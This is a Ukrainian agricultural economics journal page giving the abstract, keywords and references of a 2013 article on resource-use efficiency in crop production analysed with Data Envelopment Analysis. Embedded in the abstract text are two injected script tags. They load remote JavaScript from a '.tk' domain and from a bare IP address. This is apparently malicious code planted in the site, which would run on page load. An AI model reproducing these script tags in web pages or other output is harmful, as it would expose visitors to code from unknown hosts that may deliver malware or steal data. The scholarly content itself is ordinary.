ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 631.6.02:332.155:633
Сторінка молодого науковця

Ефективність використання ресурсів галузі рослинництва / Вітряк Т. Б. // Економіка АПК. - 2013. - № 1 - С. 136

Досліджено ефективність використання ресурсів у галузі рослинництва сільськогосподарських підприємств регіонів України і Черкаської області. Визначено регіони з високим, середнім і низьким рівнем виробництва. Проведено групування регіонів України та районів Черкаської області зокрема за рівнем ефективності, обгрунтовано доцільність використання непараметричного методу Data Envelopment Analysis (DEA) для визначення ефективності діяльності підприємства. Табл.: 3. Бібліогр.: 9.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: ефективність, непараметричний метод Data Envelopment Analysis (DEA), границя виробничих можливостей, коефіцієнт ефективності, рівень виробництва галузі рослинництва

Список використаних джерел

  1. Afriat, S.N. (1972), “Efficiency Estimation of Production Functions”, International Economic Review, 13, 568-598.
  2. Boles, J.N. (1966), “Efficiency Squared - Efficiency Computation of Efficiency Indexes”, Proceedings of the 39th Annual Meeting of the Western Farm Economics Association, pp. 137-142.
  3. Charnes A. “Measuring the Efficiency of Decision Making Units” / Charnes A., Cooper W., Rhodes E. // European Journal of Operational Research. - 1978. - № 2. - P. 429-444.
  4. МармозаА.Т. Теорія статистики: навч. посіб. / А.Т. Мармоза. — К:Ельга Ніка-Центр, 2003.
  5. Моторин P.M. Статистика для економістів: навч. посіб. / РМ. Моторин, Е.В. Чекотовський. - К: Знання, 2009.
  6. Новожилов АА. Использование метода DEA для анализа эффективности перерабатывающей отрасли / АА. Новожилов // Современные наукоемкие технологии, 2009. - № 2 - С. 43-44.
  7. Светлов Н. Оценка функции полезности сельскохозяйственного предприятия посредством линейного программирования / Н. Светлов. - M.: Никоновские чтения, 2002.
  8. Сільське господарство України: Стат. зб. - К: 2010.
  9. Федотов Ю.В. Методы и модели построения эмпирических производственных функций / Ю.В. Федотов. - СПб: Изд-во С. - Петербургского ун-та, 2007.
Читати статтю: 13_01_22.pdf